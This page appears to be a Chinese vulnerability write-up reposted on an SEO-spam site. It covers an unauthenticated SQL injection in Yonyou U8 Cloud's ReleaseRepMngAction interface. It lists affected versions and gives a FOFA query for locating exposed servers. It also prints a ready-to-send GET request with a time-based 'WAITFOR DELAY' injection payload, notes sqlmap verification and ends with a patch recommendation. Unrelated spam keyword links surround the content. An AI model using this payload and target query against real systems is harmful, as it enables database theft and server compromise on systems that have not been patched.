当前位置: 首页 > news >正文

石家庄制作网站公司有哪些高端营销型网站

石家庄制作网站公司有哪些,高端营销型网站,小程序制作填写信息,成都asp网站建设大家好,今天是Dest1ny漏洞库的专题!! 会时不时发送新的漏洞资讯!! 大家多多关注,多多点赞!!! 0x01 产品简介 用友U8 Cloud是用友推出的新一代云ERP,主要聚…

大家好,今天是Dest1ny漏洞库的专题!!

会时不时发送新的漏洞资讯!!

大家多多关注,多多点赞!!!


0x01 产品简介

用友U8 Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。是基于全新的企业互联网理念设计的云ERP系统,它旨在为企业提供集人财物客产供销于一体的云ERP整体解决方案,推动企业敏经营、轻管理、简IT,助力企业实现高速发展与云化创新。

0x02 漏洞概述

用友U8 Cloud ReleaseRepMngAction 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 影响范围

version = 1.0,2.0,2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp

0x04 复现环境

FOFA:title=="U8C"

0x05 漏洞复现

GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

延时5秒

Sqlmap验证

0x06 修复建议

升级补丁<U8CLOUD系统ReleaseRepMngAction接口存在SQL注入漏洞的安全补丁>

http://www.zhongyajixie.com/news/43866.html

相关文章:

  • 外贸怎样做网站域名申请哪家好
  • 即墨网站建设哪家好免费放单平台无需垫付
  • 自己做网站前期困难吗宁波网络推广方式
  • 如何做网站站内搜索功能东莞seo优化排名
  • 太原网站上排名上海搜索seo
  • 临漳seo整站排名网站怎样才能在百度被搜索到
  • 上海网站建设费用千锋教育培训
  • 商城网站优化方案东莞seo排名收费
  • 加微信群网站怎么做的关键词搜索广告
  • 平台网站开发价格网站关键字优化
  • 网站开发简述百度云引擎搜索
  • 汕头网站推广费用上海seo服务外包公司
  • 谈谈你对网站建设有什么样好的建设意见企业推广方式有哪些
  • 专业网站建设费用国际婚恋网站排名
  • 龙湖建设工程有限公司网站网站推广优化排名教程
  • 做网站准备培训心得体会800字
  • dw如何做网站登陆验证提交链接
  • wordpress仿36kr主题龙岩seo
  • 海口有哪几家是做网站的怎么开网店
  • 知名网站用的技术腾讯广告代理商加盟
  • 电影网站怎么做的外贸平台有哪些比较好
  • 网站可以做315认证吗最新军事新闻今日最新消息
  • 做幼儿网站的目标百度指数数据下载
  • 做金融网站需要什么营业执照seo排名优化首页
  • 对政府网站有关标准规范建设的需求关键词代发排名
  • 面料做电商 哪个网站好百一度一下你就知道
  • php企业网站模板下载b站推广入口2023年
  • 动态网页制作素材如何做网站优化
  • 石家庄网站做网站人工智能培训机构排名前十
  • 做网站推广广告网络推广员为什么做不长